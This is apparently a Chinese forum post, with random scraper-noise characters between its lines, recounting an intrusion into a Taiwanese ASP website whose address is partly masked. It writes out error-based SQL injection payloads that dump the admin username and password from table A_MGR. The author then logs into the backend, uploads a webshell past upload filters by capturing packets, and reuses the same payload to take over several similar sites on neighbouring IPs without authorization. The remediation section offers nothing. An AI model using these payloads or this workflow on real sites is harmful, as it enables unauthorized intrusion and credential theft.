发现一个注入点
( f7 f% x9 O( a; fhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833890 \. B j3 ^) h$ _
7 N, }2 S; Y4 C" |9 A# R习惯性的加’having1=1--% Y" F) V4 Q2 n
T4 ?& j! s* ]1 o" [
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—/ U0 V" X4 s7 {. ?6 |& k
7 U* |" q5 G; C' |2 @5 N6 a$ E T
09 e' Q8 S" e" c' X' n
9 Z9 x; @, b; i
爆出Diary_A.dl_Title(这时候很激动啊)
: d9 {) g/ O5 x8 Z/ t; \
! b( R; a$ T/ {$ l那么继续; ^: G& d' I( N1 X0 H m
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—! g9 h8 N- x7 B1 O4 }( R! N; W4 R2 b& V0 _
# U0 x" f9 X+ V+ h) p: }
继续,一直爆下去
7 Y4 g1 N! L, \1 \5 h6 ]. @9 z9 T" I& ^
爆到几个字段和表段 但是没找到需要的管理用户的字段0 V1 r$ y; k3 k- R+ d
) A7 _+ C& x+ b% d" E4 C( g9 q4 L: i
蛋疼了 怎么办 然后去后台登陆页看源码
! J4 [8 i% p# i- Y7 X
& F/ e& g" D# H4 I- i+ L( ~0
# U" O# ^: l1 W( p& ]' B! k6 x
+ y5 S$ t4 v6 p7 L8 P/ rInput name= “ADUID”2 j# l! u7 B+ a9 O
Input name= “ADPWD”( i6 n# v) h' J
; @4 S3 _# M6 ?) r* t5 F, }很幸运 找到了字段那就继续
2 V/ @0 X( g4 _% ~' I. u1 f/ {- {找到之后开始爆用户
+ f7 i" W4 J; {' |# i5 ^http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—
3 b1 p2 i6 e6 m4 r% }" s) W爆密码4 O! `" C x' T
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—# I9 x6 K4 Z( K$ v
测试了下 这个注入点只能爆到文章哪里的表
0 H0 H/ o+ F; _1 z% ?* t8 Z+ Y: U
1 t8 ]2 \3 m5 t8 I6 ^ b. j头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了4 p8 z2 X- j9 S, `7 O. w
7 z q( | m, d3 R3 w$ u
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
6 U1 I4 B9 z1 p; J: b3 n& t5 d8 {3 y# d+ N/ z$ o
473
; v1 A( J) Y3 [3 f
0 Y! P# ]$ J3 H. ^) y! \1 O进后台% S4 s, k' f% S- ^( u% Q3 F5 |
1 o6 Q4 @% \: c0 t
, e! @' G% V& V2 l4 i发现几个上传点 有的地方不能上传 而且防止恶意代码
, E5 s$ b7 F6 M3 r4 K+ \6 Q2 n& ]
1 X; M: q; t( Z* c5 d4 k" t没办法 各种百度各种找大牛 找到一只好像可以突破的马
! ~" o0 t) X" v. M& z) z4 i9 k9 X
; O- }8 ]6 A4 \( g" e \在系统管理那里直接上传 不过没有显示地址
2 [4 G; U- b$ r# w/ T1 u' a8 p4 G& A* h! @3 Q8 t" |
再上传一次 抓包 搞定OK
" a% q, R7 o' Y3 M: B1 z/ W
) F/ u$ E0 u; F' M! y. p% F+ p B5 J$ h6 _, h
* n4 p; a; J/ [3 U) m% j: M
472+ `* R7 K) f0 S m$ y
2 ^, Z# i+ s: T
晚上不行了 去睡觉。。。
" s2 D5 h7 R @" i第二天刚起床 闲的没事做继续日站吧 ( e0 Z6 w7 ~4 \
. S% j4 i, G9 N% P7 X+ P! }
找个站 就把这个站的旁c扫了下
7 j& q* c" A: O: C- r/ R3 |! I& N1 S1 x+ e
发现c段也有一个购物站 ,然后还和这个站的模板差不多
; r! K( v- j3 ^& Z) Q s* q" A7 s/ Y( Q5 j% F0 u
就找到会员登录口测试7 ^8 D1 N* T; H; H) S& r
$ j' X- q7 z0 \" B* E) c6 L'and (select top 1 MGR_UID from A_MGR)>0—
/ Y- h' U& i; T( {# P4 t果断爆到了 这时候我很激动 通杀
) E8 e& G3 @* ]8 m# b6 c
! E! y" M+ v5 |1 J再次翻c段
+ a; a4 R* v. K. M9 s8 m+ V! I# T% `. r8 j: _2 i4 Q: v' C3 S, ]; J
翻出几个站 都成功拿下; L( I+ [- W3 g, f1 |6 H
4 X4 W- g+ L1 ~2 l2 p; v
6 }0 \" M7 _5 r% h
9 ^2 W' |" p1 A; k i# k: N! b修复方案:% M* d8 l( h5 W
他们比我专业
( e3 K3 E- ~3 f0 r& U' D f
) @; p6 c6 n0 ~9 b5 Z2 h
2 u5 [5 B, s3 m$ d6 D
& s/ L8 V! J$ e7 Z/ g, s! ^: q |